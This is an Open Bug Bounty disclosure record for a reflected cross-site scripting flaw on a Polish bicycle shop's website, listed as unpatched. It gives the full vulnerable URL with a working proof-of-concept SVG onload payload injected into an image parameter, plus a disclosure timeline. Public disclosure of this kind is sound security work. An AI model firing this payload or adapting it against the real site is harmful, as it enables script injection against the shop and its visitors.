rowery.shop.pl XSS vulnerability

2017-09-08T12:36:00
ID OBB:291170
Type openbugbounty
Reporter M0r3h4x
Modified 2017-12-07T13:38:00

Description

Vulnerable URL:
http://rowery.shop.pl/catalog/view/theme/_ajax_view-product.php?product_href=http://rowery.shop.pl/index.php?route=product/product&product;_id=502&view;_details=Szczeg%C3%B3%C5%82yℑ_main=xss%22%3E%3Csvg/onload=prompt(/openbugbounty/)%3Eℑ_popup=http://rowery.shop.pl/image/cache/products/502/muz269ia-1200x1600.png&product;_name=EVADO%204.0&product;_price=2.099%20z%C5%82&product;_special=1.789%20z%C5%82&product;_rating=0&array;_images=s:8:%22s:1:%220%22;%22;&product;_description_short=SPECYFIKACJA --%20por%C3%B3wnaj%20-- Evado%207.0Trans%20SolarTrans%20GlobalEvado%206.0Trans%20AfricaTrans%20ArcticaEvado%205.0Trans%20SanderTrans%20AlpTrans%20PacificEvado%203.0Evado%202.0Trans%20SiberianTrans%20AtlanticEvado%201.0Trans%20IndiaRamaAluminium%20LiteWidelecSR%20Suntour%20NEX%20HLO%20(skok%2063mm)Tylny%20amortyzator-Ilo%C5%9B%C4%87%20bieg%C3%B3w24Przerzutka%20prz%C3%B3dShimano%20Altus%20FD-M191Przerzutka%20ty%C5%82Shimano%20Alivio%20RD-T4000Hamulec%20prz%C3%B3dTektro%20Disc%20HDC-300%20(hydrauliczny,%20tarcza%20160mm)Hamulec%20ty%C5%82Tektro%20Disc%20HDC-300%20(hydrauliczny,%20tarcza%20160mm)D%C5%BAwignie%20hamulcaTektro%20Disc%20HDC-300%20(hydrauliczne)ManetkiShimano%20Altus%20SL-M310%203x8-bieg%C3%B3wKorbyShimano%20Tourney%20FC-M171%2048/38/28T%C5%81a%C5%84cuchYBN%20S8Kaseta%20/%20WolnobiegShimano%20Acera%20CS-HG41-8%2011-32TPiasta%20prz%C3%B3dJoy%20Tech%20D041DSEPiasta%20ty%C5%82Joy%20Tech%20D142DSEOponySchwalbe%20CX%20Comp%20Kevlar%20Guard%2028%22x1,5%22Obr%C4%99czeKross%20(Aluminium,%20podw%C3%B3jna%20%C5%9Bcianka)KierownicaKross%20Active%20Components%20(Aluminium,%20niski%20wznios,%20620mm-S;%20640mm-M,L;%20660mm-Xl,%2031,8mm)Wspornik%20kierownicyKross%20Active%20Components%20(Aluminium,%20ahead,%2031,8mm)Wspornik%20siod%C5%82aKross%20Active%20Components%20(Aluminium,%2027,2mm)SteryFeimin%20H835BSiod%C5%82oSelle%20Royal%20ShadowChwytyHerrmans%20OxyPeda%C5%82yAluminium%20VP-519AWaga14.6Uwagi-...
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 07.12.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4767148
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 September, 2017 12:36 GMT
Generic security notifications sent to website owner| 8 September, 2017 12:39 GMT
Vulnerability details disclosed by researcher| 7 December, 2017 13:38 GMT